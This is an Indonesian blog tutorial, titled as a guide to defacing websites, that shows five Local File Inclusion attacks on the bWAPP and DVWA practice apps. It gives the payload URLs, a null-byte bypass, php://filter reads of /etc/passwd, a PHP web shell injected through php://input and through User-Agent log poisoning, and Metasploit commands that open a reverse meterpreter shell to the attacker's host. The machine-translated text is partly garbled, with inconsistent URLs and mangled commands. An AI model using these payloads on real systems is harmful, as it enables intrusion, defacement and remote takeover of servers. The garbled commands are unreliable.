Home » , , , , , , , , , , , » 5 Cara Deface dengan metode LFI (Local File Inclusion) | LFI Hacking Tutorial

5 Cara Deface dengan metode LFI (Local File Inclusion) | LFI Hacking Tutorial

5 Cara Deface dengan metode LFI (Local File Inclusion) | LFI Hacking Tutorial




Tujuan utama penulisan artikel ini adalah untuk berbagi ide melakukan serangan terhadap server web dengan menggunakan berbagai teknik saat server menderita kerentanan inklusi file. Karena kita semua menyadari kerentanan LFI yang memungkinkan pengguna menyertakan file melalui URL di browser. Pada artikel ini saya telah menggunakan dua platform yang berbeda bWAPP dan DVWA yang berisi kerentanan inklusi file dan melalui mana saya telah melakukan serangan LFI dengan empat cara berbeda.

1.Penyertaan File Lokal Dasar (Basic Local File Inclusion)

Buka target IP di browser dan login di dalam BWAPP sebagai lebah: bug sekarang pilih bug remote & local file inclusion lalu klik hack.



Di sini halaman web yang diminta yang menderita Kerentanan RFI & LFI terbuka. Di mana Anda akan menemukan komentar untuk memilih bahasa dari daftar drop down yang diberikan, dan saat Anda mengeklik tombol pergi, file bahasa yang dipilih disertakan dalam URL. Untuk melakukan serangan dasar memanipulasi

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go ke 192.168.1.101/bWAPP/flfi.php?language=/etc/passwd

 Dalam serangan LFI dasar kita bisa langsung membaca isi file dari direktorinya menggunakan (../) atau hanya (/), sekarang jika Anda akan melihat gambar di bawah ini, Anda akan menemukan bahwa saya telah mengakses file kata sandi bila di atas URL dijalankan di browser.


2.Null Byte

 Dalam beberapa skenario serangan inklusi file lokal di atas mungkin tidak berjalan karena tingkat keamanan yang tinggi. Dari gambar di bawah Anda dapat mengamati sekarang bahwa saya gagal membaca file kata sandi saat menjalankan jalur yang sama di URL. Jadi saat kita menghadapi masalah seperti itu maka masuklah serangan NULL BYTE.

Sekarang nyalakan suite burp untuk menangkap permintaan browser lalu pilih tab proxy dan mulai mencegat. Jangan lupa atur browser proxy sambil memanfaatkan ajang burp suite



Sekarang di dalam kotak burp kirim data yang dicegat ke dalam repeater.


Di dalam repeater Anda bisa melakukan analisis permintaan dan respons yang dikirim olehnya. Dari tangkapan layar akan jelas bahwa / etc / passwd tidak berfungsi dan saya tidak dapat membaca file kata sandi.




Dari screenshot berikut Anda bisa melihat saya meneruskan permintaan dengan menambahkan karakter null (% 00) di akhir direktori / etc / passwd% 00 dan klik pada tab go. Kemudian pada sisi kanan jendela file password terbuka sebagai respon



3. Base64 Encoded

 Sekarang ada cara lain untuk memanfaatkan LFI saat tingkat keamanan tinggi dan Anda tidak dapat melihat konten file PHP, lalu gunakan fungsi PHP berikut.

http://192.168.1.101/bWAPP/rlfi.php?language= php: //filter/read=convert.base64-encode/resource=/etc/passwd

Di sini dari screenshot Anda bisa melihat isi file password yang dikodekan menjadi base64; salin seluruh teks yang dikodekan.

Saya menggunakan hackbar yang merupakan plugin Firefox untuk memecahkan kode di atas teks yang disalin.




Sekarang kotak pop-up akan terbuka melewati teks dikodekan disalin di dalamnya dan klik ok




Dari hasil tangkapan layar yang diberikan Anda bisa melihat hasilnya dan membaca isi file password.





4. PHP Input

Dengan menggunakan fungsi input PHP kita akan mengeksekusi kode PHP yang disuntikkan untuk memanfaatkan kerentanan LFI. Dengan bantuan hackbar saya akan melakukan tugas ini di mana pertama kita perlu memuat URL dari halaman web yang ditargetkan seperti yang bisa Anda lihat di screenshot yang diberikan.

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go


Sekarang memanipulasi URL di atas dengan menggunakan fungsi input PHP

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

 Kemudian pilih kotak centang untuk mengaktifkan data Post yang akan meneruskan permintaan posting dan menambahkan komentar cmd di area teks yang diberikan <? Php system ($ _ GET ['cmd']); ?> seperti yang ditunjukkan pada screenshot berikut, akhirnya klik execute.




Sekarang saatnya menghubungkan korban melalui koneksi balik; buka terminal di kali Linux dan ketik msfconsole untuk memulai framework metasploit.

Sekarang ketik menggunakan exploit / multi / script / web_delivery

msf exploit (web_delivery)> set target 1

msf exploit (web_delivery)> set payload windows / meterpreter / reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.0.104

msf exploit (web_delivery)> set srvport 8081

msf exploit (web_delivery)> exploit

Salin teks yang disorot yang ditunjukkan di bawah jendela




Paste    di atas kode PHP disalin di dalam URL seperti yang ditunjukkan pada gambar dan jalankan.


Bila URL di atas bisa berhasil, penyerang mendapatkan sesi meterpreter korban di dalam metasploit.

msf exploit (web_delivery)> sesi -I 1

meterpreter> sysinfo


5. Proc / Self / Environ

Jika server sudah usang maka untuk memanfaatkannya melalui LFI kita bisa memasukkan file proc / self / environ yang menyimpan User_Agent dimana kita akan menempatkan kode PHP kita untuk menjalankan perintah CMD. http://192.168.1.102/dvwa/vulnerabilities/fi/?page=proc/self/environ




Sekarang mulai burp suite dan ambil permintaan browser dan kirim data fetch ke repeater.



Tambahkan komentar cmd <? Php system ($ _ GET ['cmd']); ?> di dalam user_Agent dan kirimkan permintaan dengan parameter GET 192.168.1.8/lfi/lfi.php?file=/var/www/apachae2/access.log&cmd=id seperti yang ditunjukkan pada gambar di bawah ini. Di sisi kanan jendela Anda bisa melihat hasil sorotan sebagai respon.




kurang lebihnya mohon maaf, jangan lupa like & share. berbagi itu indah.

Thanks for reading & sharing BELAJAR DIKACANGIN

Previous
« Prev Post

1 comments:

iklan

donation

Donation
Donation For Aray Nctrl

Contact Form

Name

Email *

Message *